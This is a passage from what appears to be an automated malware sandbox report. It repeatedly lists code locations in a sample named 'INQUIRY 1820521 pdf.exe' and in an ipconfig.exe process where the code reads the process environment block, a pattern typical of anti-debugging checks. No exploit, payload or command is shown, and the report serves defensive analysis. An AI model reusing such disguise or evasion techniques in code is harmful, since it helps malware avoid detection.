          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156D294 mov eax, dword ptr fs:[00000030h]9_2_0156D294
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154AAB0 mov eax, dword ptr fs:[00000030h]9_2_0154AAB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154AAB0 mov eax, dword ptr fs:[00000030h]9_2_0154AAB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156FAB0 mov eax, dword ptr fs:[00000030h]9_2_0156FAB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01557D50 mov eax, dword ptr fs:[00000030h]9_2_01557D50
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01573D43 mov eax, dword ptr fs:[00000030h]9_2_01573D43
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B3540 mov eax, dword ptr fs:[00000030h]9_2_015B3540
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155C577 mov eax, dword ptr fs:[00000030h]9_2_0155C577
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155C577 mov eax, dword ptr fs:[00000030h]9_2_0155C577
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608D34 mov eax, dword ptr fs:[00000030h]9_2_01608D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153AD30 mov eax, dword ptr fs:[00000030h]9_2_0153AD30
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FE539 mov eax, dword ptr fs:[00000030h]9_2_015FE539
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015BA537 mov eax, dword ptr fs:[00000030h]9_2_015BA537
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]9_2_01564D3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]9_2_01564D3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]9_2_01564D3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov ecx, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015E8DF1 mov eax, dword ptr fs:[00000030h]9_2_015E8DF1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154D5E0 mov eax, dword ptr fs:[00000030h]9_2_0154D5E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154D5E0 mov eax, dword ptr fs:[00000030h]9_2_0154D5E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016005AC mov eax, dword ptr fs:[00000030h]9_2_016005AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016005AC mov eax, dword ptr fs:[00000030h]9_2_016005AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156FD9B mov eax, dword ptr fs:[00000030h]9_2_0156FD9B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156FD9B mov eax, dword ptr fs:[00000030h]9_2_0156FD9B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562581 mov eax, dword ptr fs:[00000030h]9_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01532D8A mov eax, dword ptr fs:[00000030h]9_2_01532D8A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]9_2_01561DB5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]9_2_01561DB5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01561DB5 mov eax, dword ptr fs:[00000030h]9_2_01561DB5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015635A1 mov eax, dword ptr fs:[00000030h]9_2_015635A1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CC450 mov eax, dword ptr fs:[00000030h]9_2_015CC450
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CC450 mov eax, dword ptr fs:[00000030h]9_2_015CC450
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A44B mov eax, dword ptr fs:[00000030h]9_2_0156A44B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155746D mov eax, dword ptr fs:[00000030h]9_2_0155746D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6C0A mov eax, dword ptr fs:[00000030h]9_2_015B6C0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F1C06 mov eax, dword ptr fs:[00000030h]9_2_015F1C06
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]9_2_0160740D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]9_2_0160740D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160740D mov eax, dword ptr fs:[00000030h]9_2_0160740D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156BC2C mov eax, dword ptr fs:[00000030h]9_2_0156BC2C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F14FB mov eax, dword ptr fs:[00000030h]9_2_015F14FB
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]9_2_015B6CF0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]9_2_015B6CF0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6CF0 mov eax, dword ptr fs:[00000030h]9_2_015B6CF0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608CD6 mov eax, dword ptr fs:[00000030h]9_2_01608CD6
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154849B mov eax, dword ptr fs:[00000030h]9_2_0154849B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608F6A mov eax, dword ptr fs:[00000030h]9_2_01608F6A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154EF40 mov eax, dword ptr fs:[00000030h]9_2_0154EF40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154FF60 mov eax, dword ptr fs:[00000030h]9_2_0154FF60
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155F716 mov eax, dword ptr fs:[00000030h]9_2_0155F716
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CFF10 mov eax, dword ptr fs:[00000030h]9_2_015CFF10
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CFF10 mov eax, dword ptr fs:[00000030h]9_2_015CFF10
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A70E mov eax, dword ptr fs:[00000030h]9_2_0156A70E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A70E mov eax, dword ptr fs:[00000030h]9_2_0156A70E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156E730 mov eax, dword ptr fs:[00000030h]9_2_0156E730
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160070D mov eax, dword ptr fs:[00000030h]9_2_0160070D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160070D mov eax, dword ptr fs:[00000030h]9_2_0160070D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01534F2E mov eax, dword ptr fs:[00000030h]9_2_01534F2E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01534F2E mov eax, dword ptr fs:[00000030h]9_2_01534F2E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015737F5 mov eax, dword ptr fs:[00000030h]9_2_015737F5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01548794 mov eax, dword ptr fs:[00000030h]9_2_01548794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]9_2_015B7794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]9_2_015B7794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7794 mov eax, dword ptr fs:[00000030h]9_2_015B7794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01547E41 mov eax, dword ptr fs:[00000030h]9_2_01547E41
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAE44 mov eax, dword ptr fs:[00000030h]9_2_015FAE44
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAE44 mov eax, dword ptr fs:[00000030h]9_2_015FAE44
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155AE73 mov eax, dword ptr fs:[00000030h]9_2_0155AE73
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154766D mov eax, dword ptr fs:[00000030h]9_2_0154766D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0156A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01568E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_0153E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01578EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01608ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_01600EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 9_2_015B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03274F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03274F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0330FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0330FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0334070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0334070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03348F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03348B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03345BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03281B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03281B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0332D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03288794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0332FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03288A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03293A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03275210 mov ecx, dword ptr fs:[00000030h]
